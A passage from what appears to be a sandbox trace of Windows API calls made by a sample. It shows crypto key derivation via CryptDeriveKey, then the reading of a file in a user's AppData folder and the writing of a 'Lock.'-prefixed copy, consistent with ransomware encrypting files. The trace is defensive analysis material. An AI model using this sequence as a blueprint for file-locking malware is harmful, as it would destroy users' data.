(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0234.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0234.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0234.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0234.459] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0234.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0234.459] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0234.459] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51460 [0234.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0234.460] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0234.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0234.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0234.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0234.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0234.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0234.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0234.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0234.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0234.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0234.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0234.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0234.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0234.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0234.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0234.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0234.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0234.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0234.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0234.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5d0 | out: hHeap=0x970000) returned 1 [0234.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0234.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0234.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0234.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0234.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0234.460] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0234.460] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0234.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0234.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0234.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0234.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0234.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0234.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0234.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0234.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0234.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0234.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0234.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0234.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0234.461] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0234.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0234.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0234.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0234.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0234.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0234.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0234.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0234.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0234.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0234.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0234.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0234.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0234.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0234.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0234.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0234.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0234.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0234.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0234.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0234.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0234.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0234.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0234.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0234.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0234.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0234.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0234.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0234.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0234.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0234.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0234.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0234.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0234.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0234.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0234.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0234.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0234.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0234.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0234.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0234.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0234.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0234.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0234.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0234.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0234.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0234.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0234.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0234.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0234.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0234.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0234.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0234.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0234.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0234.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0234.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0234.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0234.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0234.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0234.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0234.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e512f8 [0234.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e512f8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0234.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0234.463] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0234.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0234.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0234.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0234.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0234.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0234.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0234.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0234.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0234.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0234.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0234.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0234.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0234.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0234.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0234.464] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87590, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87250) returned 1 [0234.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0234.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0234.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0234.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0234.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0234.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0234.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0234.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0234.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0234.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0234.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0234.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0234.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0234.465] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.465] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0234.465] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.465] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.465] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.465] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.465] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0234.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0234.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0234.465] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0234.465] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0234.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0234.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69ac8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0234.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0234.465] CryptDestroyHash (hHash=0xa87590) returned 1 [0234.466] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0234.466] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.466] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0234.466] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0234.466] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.467] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/MWbKfh.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mwbkfh.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0234.467] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.467] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0234.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69988 [0234.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0234.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504e8 | out: hHeap=0x970000) returned 1 [0234.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0234.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50428 | out: hHeap=0x970000) returned 1 [0234.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0234.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0234.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0234.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0234.467] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0234.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0234.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0234.468] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0234.468] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0234.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0234.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0234.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0234.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0234.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0234.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0234.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0234.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0234.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0234.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0234.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x90) returned 0x2e56588 [0234.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0234.468] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0234.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0234.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0234.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0234.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04810 [0234.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0234.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0234.469] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.MWbKfh.gif" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.mwbkfh.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0234.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0234.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0234.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0234.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0234.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0234.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0234.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50500 | out: hHeap=0x970000) returned 1 [0234.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0234.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0234.471] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0234.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0234.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0234.471] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.471] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0234.471] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0234.471] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0234.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0234.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0234.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0234.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) 